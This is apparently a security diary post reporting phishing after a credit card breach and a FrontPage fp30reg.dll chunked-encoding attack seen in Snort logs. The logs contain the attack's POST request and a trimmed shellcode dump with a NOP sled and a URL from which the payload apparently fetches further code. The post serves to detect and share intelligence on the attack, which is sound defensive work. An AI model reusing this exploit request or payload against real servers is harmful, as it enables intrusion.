An article on TMCNet's site indicates that phishers are attempting to exploit the worries of credit card holders following last week's announcement of a break-in that could have revealed up to 4 million credit card numbers. Pleasant.
indicate that only 13.9 CC numbers were MasterCard. Thanks Bao!
Unusual FrontPage Hack
Ryan Barnett (CIS Apache Benchmark Project Lead) writes in with some Snort logs indicating an attempted Front Page hack on a system he is monitoring. The first entry indicates an attempt to exploit the chunked-encoding transfter bug:
[**] WEB-MISC Chunked-Encoding transfer attempt [**]
06/20-23:46:58.486734 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18331 IpLen:20 DgmLen:161 DF
***AP*** Seq: 0x5C80E4DE Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1..Host: 192.168.1.100
..Transfer-Encoding: chunked..Content-Length: 1499....
Which is a normal scan I'm sure many readers are familiar with. The unusual bit is an x86 NOOP alert that followed:
[**] SHELLCODE x86 NOOP [**]
06/20-23:46:58.489143 66.161.76.150:39942 -> 192.168.1.100:80
TCP TTL:61 TOS:0x0 ID:18332 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x5C80E557 Ack: 0xC919E70B Win: 0xC1E8 TcpLen: 20
5db.........................g...................................
................................................................
................................................................
................................................................
................g...............................................
......Ehttp://10.10.2.2:191/lsd.080/lsd..b.]3.f....u.....<.u.F..
,0F4...G..............q................rh.B.f..............q....
This output has been trimmed for space. Ryan indicates that there is no internal host at 10.10.2.2 listening on port 191. If there are any other readers with similar log entries matching port 191 or the /lsd.* URL, please